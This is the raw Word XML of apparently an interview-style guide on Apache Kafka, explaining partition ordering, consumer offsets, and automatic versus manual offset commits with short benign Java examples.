    <w:p w14:paraId="5F3A5624" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1340"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Message Ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka guarantees message ordering within a partition, which is critical for many use cases that rely on the sequence of messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C079B1D" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka partitions are a cornerstone of Kafka’s design, enabling the system to scale efficiently while maintaining fault tolerance, high throughput, and parallel processing. They are key to Kafka’s ability to handle real-time, high-volume data streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB127D7" w14:textId="5364647D" w:rsidR="00304319" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00304319">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A7847B9">
          <v:rect id="_x0000_i3157" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEF302A" w14:textId="6066F671" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB22BB" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="781" w:name="_Toc196308261"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the concept of Kafka offset and how it is managed by consumers</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="781"/>
    </w:p>
    <w:p w14:paraId="3DE383A9" w14:textId="25CB6BCE" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 Offset: Concept and Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3EC92D"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In Kafka, </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are unique identifiers (or positions) that Kafka consumers use to keep track of which message they have read in a topic partition. Each message within a partition has an offset, and Kafka uses these offsets to allow consumers to know where they left off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB8BAEE" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451"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Concept of Kafka Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE838C5" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D69E3C" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="134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An </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a numerical identifier assigned to each message within a Kafka partition. The offset starts at 0 and increases incrementally for each subsequent message in the partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B810DE8" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="134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Offsets are </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition-specific</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning that each partition of a Kafka topic has its own sequence of offsets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FF5A45" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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afka Offset for Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F36CC81" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="134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doesn’t force consumers to consume messages sequentially or to start from the beginning of a partition. A consumer can pick up at any point in a partition by specifying the offset it wants to start consuming from.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6450369F" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="134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sumers are responsible for managing their own offsets (i.e., tracking which message they have consumed), and Kafka allows consumers to commit (save) their current offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744C4FB8" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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Example of Offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suppose a Kafka topic order_topic has a single partition (Partition 0) with the following messages:</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638"/>
        <w:gridCol w:w="878"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="741120A1" w14:textId="77777777" w:rsidTr="00412451">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E9B3D81" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451"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Offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14935ADA" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451"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Message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="7BCE8A04" w14:textId="77777777" w:rsidTr="00412451">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="501DAC9C"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D73BAB6"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Order 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="074D012F" w14:textId="77777777" w:rsidTr="00412451">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D91BA9B"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AB0AF97"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Order 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="284F3E37" w14:textId="77777777" w:rsidTr="00412451">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30332CEF"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="364FA3E4"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Order 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="286AA4D7" w14:textId="77777777" w:rsidTr="00412451">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03129C66"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C06B56A"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Order 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E4283EE" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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e consumer will read messages sequentially, starting at offset 0 and continuing up to the highest offset. After reading a message, the consumer records the offset (commit) so that it can resume from the same point if it crashes or restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CC014C" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451"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How Kafka Offset is Managed by Consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455AB785"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provides flexibility for consumers in terms of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offset management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Offsets can be managed </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manually</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, depending on the consumer's configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443F4D59" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Automatic Offset Management (Auto-commit)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B87159D" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13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provides a default setting where the consumer </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically commits</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> offsets after a certain interval (auto.commit.interval.ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1855106A" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13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is means that as a consumer processes a message, it records (commits) the offset of that message. In case the consumer crashes or restarts, it can resume from the last committed offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126366F6" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13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isadvantage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: There could be cases where messages are lost or processed multiple times if the consumer crashes before the offset is committed (due to the auto-commit happening after processing the message).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71A48B"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lastRenderedPageBreak/>
        <w:t>Example of enabling auto-commit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C20C50"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erties properties = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635F2C28"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erties.put("bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552DE53A"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erties.put("group.id", "test-group");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBFD515"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erties.put("enable.auto.commit", "true");  // Auto-commit enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E7FDD"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erties.put("auto.commit.interval.ms", "1000");  // Commit interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325C1714" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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anual Offset Management (Manual Commit)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EE3349" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13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n some use cases, you may want finer control over when offsets are committed, especially when processing needs to be more robust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3222E6" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13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allows consumers to manually commit offsets by calling the commitSync() or commitAsync() methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7071D846" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13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mmitSync()</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Commits the current offset synchronously, blocking until the commit is acknowledged by Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A82E60C" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13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mmitAsync()</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Commits the current offset asynchronously, not blocking the consumer. This method is faster but might lose track of an offset if something goes wrong during the commit process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC0347F"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Example of manual offset commit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAAD9AE"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Consumer&lt;String, String&gt; consumer = new KafkaConsumer&lt;&gt;(properties);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376DD77B"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sumer.subscribe(Arrays.asList("order_topic"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF05969" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA2CED0"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Consume messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E4C7D8"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sumerRecords&lt;String, String&gt; records = consumer.poll(Duration.ofMillis(1000));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D391D7"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for (ConsumerRecord&lt;String, String&gt; record : records) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8EE648"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System.out.println("Consumed message: " + record.value());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712537B0"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD64B7B" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271A80EE"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Manually commit the offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED0FCBC"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sumer.commitSync();  // Synchronously commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727C7CB4" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Offset Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC8FF60" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13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Offsets are stored in Kafka itself, specifically in an internal topic called __consumer_offsets. This internal topic holds the offsets for each consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F9D4A0" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13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he offset is stored as a combination of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</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topic</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partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. For each group and partition, Kafka stores the last successfully committed offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5ED44B" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Groups and Offset Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0316BD" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13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Each Kafka consumer group has its own </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
